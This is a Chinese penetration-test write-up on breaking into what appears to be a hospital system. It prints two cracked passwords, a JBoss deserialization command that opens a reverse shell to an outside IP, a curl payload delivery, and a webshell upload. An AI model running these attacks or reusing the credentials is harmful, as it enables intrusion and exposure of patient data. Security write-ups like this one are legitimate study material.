记一次渗透实战

  • A+

目标:http://xxx.xx.xxx.xx:9002/zxxxxxg/bxm/login.php

访问目标:

1.png

完事不慌burp抓包 ,查看响应包

2.png

尝试枚举跑中国人名字典爆破无果

0.1.jpg

常规操作 ,对目标目录进行删减 ,发现了目录遍历的漏洞

http://xxx.xx.xxx.xx:9002/zxxxxxg/

3.png

尝试能不能获取有用的信息 ,

随意点击,爆出路径,为后面上传webshell 做铺垫

4.png

之后发现了数据库的文件

http://xxx.xxx.xxx.xx:9002/zxxxing/txb.2xxxx1x9.sql

发现了两个账号

5.png

对密码进行解密

图片6.png

图片7.png

admin/12345678
coolfd/shj811004

获得两个账号 ,尝试登陆
发现两个账号不可用 ,可能是另外一个系统的吧

继续搞呗

找到一个网站
http://www.xxxxxxx.cc/index.html

试试有没有后台
http://www.xxxxxxx.cc/admin/login.php#

http://www.xxxxxx.com/

http://www.xxxxx.com/admin/login.php#

尝试登陆后台 ,发现coolfd账号可用

8.png

登陆后台了

尝试找上传点

上传多次无果

/myxxxtor/atxxxhed/ixxge/20xx923/201xxx23xxx623_39094.jpg

多处

9.png

没有写权限

10.png

多处上传失败

只能搞ip

对目标ip进行端口扫描

11.png

逐个访问,发现了jboss

http://xxx.xx.xxx.xx:9080/

想到jboss 反序列化漏洞

12.png

在网上找了反序列化的exp

将payload生成好了,直接使用

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 182.92.. 7777

监听端口

13.png

curl http://xxx.xx.xxx.xx:9080/inxxker/rxxoxxnly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

向目标路径 /inxxker/rxxoxxnly

14.png

即可拿到目标的最高权限

找到网站路径

发现了PHPinfo探针

http://xxx.xxx.xxx.xx:9002/phpinfo.php

15.png

好像无法使用下载命令

Curl wget

只能用打包好的工具上传webshell了
6哥工具执行好像乱码了

16.png

只好上传冰蝎木马上去
知道路径 直接上传

17.png

为了便于管理,上传一个webshell

18.png

在文件管理看到了数据库文件

19.png

发现了账号和密码

20.png

解密成功,后台登陆成功

21.png

看起来是医院的系统

22.png

个人病例信息大量泄露

23.png

http://xxx.xx.xxx.xx:9002/zxxxxng/rxxg/35735xxxxx94369773.jpg

部分报告单泄露

为了安全起见,将木马已经删除了

似乎存在域环境

可惜自己菜 ,未敢深入

24.png

0.3.jpg

到这里就结束了,授权项目,如有打码不规范,请勿私自渗透,违者后果自负

相关推荐: Wordpress 插件命令执行

环境搭建 利用 phpstudy 搭建 wordpress ,http://wordpress.test/wp-admin/plugin-install.php 将解压一次后的漏洞插件压缩包上传并启用插件。 File Manager插件6.0版本 漏洞利用 这…